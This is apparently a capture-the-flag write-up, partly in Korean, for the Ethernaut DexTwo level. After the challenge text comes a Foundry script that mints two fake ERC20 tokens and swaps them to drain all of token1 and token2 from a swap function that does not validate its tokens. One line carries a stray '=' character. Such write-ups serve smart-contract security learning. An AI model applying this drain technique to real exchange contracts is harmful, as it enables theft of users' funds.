This level will ask you to break DexTwo, a subtlely modified Dex contract from the previous level, in a different way.
You need to drain all balances of token1 and token2 from the DexTwo contract to succeed in this level.
You will still start with 10 tokens of token1 and 10 of token2. The DEX contract still starts with 100 of each token.
Things that might help:
How has the swap method been modified?
목표는 컨트랙트의 토큰1과 토큰2 다 소진하기!!
two라서 어려울 줄 알고 좀 쫄았었는데 dex에서 조금만 더 가면 되는 문제
// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;
import "forge-std/Script.sol";
import "../instances/Ilevel23.sol";
import "@openzeppelin/contracts/token/ERC20/ERC20.sol";
contract FakeToken is ERC20 {
constructor() public ERC20("FakeToken", "FAKE") {
_mint(msg.sender, 1000 * 10 ** 18);
}
}
contract DexTwoExploit is Script {
DexTwo dex = DexTwo(0x84c765cfdbA36b9e81Db0eb7C9356eed77296ed6); =
function run() external {
vm.startBroadcast();
FakeToken fakeToken1 = new FakeToken();
FakeToken fakeToken2 = new FakeToken();
fakeToken1.approve(address(dex), uint256(-1));
fakeToken2.approve(address(dex), uint256(-1));
dex.swap(address(fakeToken1), dex.token1(), 100);
dex.swap(address(fakeToken2), dex.token2(), 100);
vm.stopBroadcast();
}
}
